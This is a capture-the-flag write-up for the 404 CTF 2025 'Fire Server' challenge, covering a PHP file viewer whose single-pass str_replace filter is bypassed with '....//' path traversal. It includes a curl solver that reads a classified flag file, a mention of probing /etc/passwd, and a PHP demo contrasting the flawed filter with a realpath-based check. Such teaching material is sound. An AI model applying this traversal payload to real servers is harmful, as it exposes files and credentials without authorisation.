Fire Server | 404 CTF 2025

Fire Server

Resources

  • URL: https://fire-server.404ctf.fr/
  • FILE: fire-server.zip

  • doc*.txt
  • Dockerfile
  • index.php

Exploration

When we click on a file, the website writes its content to the screen. The request it makes is: ?path=doc1.txt.

If we try to read the file ../../../../etc/passwd, we get an error, so there is a restriction on the path that we may need to find a way to bypass.

Code

Dockerfile

RUN mkdir -p /var/files/classified && \
    echo "Mission Selenium – Niveau 5 Confidentiel\nAnalyse de l’organisme prélevé sur la face cachée lunaire : activité bioélectrique persistante.\nExpérimentations poursuivies malgré les objections éthiques.\n404CTF{fakeflag}" \
    > /var/files/classified/selenium && \
    chmod 640 /var/files/classified/selenium && \
    chown www-data:www-data /var/files/classified/selenium

We can see that the flag is written to /var/files/classified/selenium.

index.php

$decodedPath = str_replace("../", "", $decodedPath);

We can see that every ../ is removed from the path. However, str_replace makes a single pass and does not re-check its own output: if we send ....//, removing the inner ../ leaves ../, so we bypass the restriction.

Now we can get the flag with the following solver:

curl -s https://fire-server.404ctf.fr/\?path\=....//....//....//....//var/files/classified/selenium | grep 404CTF{
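The single-pass filter next to a containment check that resolves the path before comparing it, as an added example (not the challenge's index.php). The function names and the temporary directory tree are assumptions constructed for the demonstration.

```php
<?php
// Added example: constructed directory tree, hypothetical function names.

// The filter from index.php: str_replace() makes one pass and never
// re-scans the text it has just produced.
function strip_once(string $path): string
{
    return str_replace('../', '', $path);
}

// Hardened lookup: canonicalise first, then require the result to sit
// under the served directory. No string filtering is involved.
function resolve_inside(string $baseDir, string $userPath): ?string
{
    $base = realpath($baseDir);
    $target = realpath($baseDir . '/' . $userPath);
    if ($base === false || $target === false) {
        return null;                    // missing base or missing file
    }
    // Trailing separator stops "/srv/public-old" matching "/srv/public".
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;                    // resolved outside the base
    }
    return is_file($target) ? $target : null;
}

// Constructed sandbox standing in for a public and a classified directory.
$root = realpath(sys_get_temp_dir()) . '/fire-demo-' . bin2hex(random_bytes(4));
mkdir("$root/public", 0700, true);
mkdir("$root/classified", 0700, true);
file_put_contents("$root/public/doc1.txt", "public document\n");
file_put_contents("$root/classified/selenium", "PLACEHOLDER_SECRET\n");

$inputs = ['doc1.txt', '../classified/selenium', '....//classified/selenium'];
foreach ($inputs as $input) {
    $filtered = strip_once($input);
    // Where the filtered path lands if it is opened directly (weak design).
    $weak = realpath("$root/public/$filtered");
    $escapes = $weak !== false && strpos($weak, "$root/classified/") === 0;
    $safe = resolve_inside("$root/public", $input);
    printf("%-27s filtered=%-24s weak_escapes=%-3s hardened=%s\n",
        $input, $filtered, $escapes ? 'yes' : 'no', $safe ?? 'rejected');
}

// Remove the constructed sandbox.
array_map('unlink', ["$root/public/doc1.txt", "$root/classified/selenium"]);
array_map('rmdir', ["$root/public", "$root/classified", $root]);
```

Only the ....// input escapes through the filtered path, while the hardened lookup rejects both traversal inputs and still serves doc1.txt.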

This post is licensed under CC BY 4.0 by the author.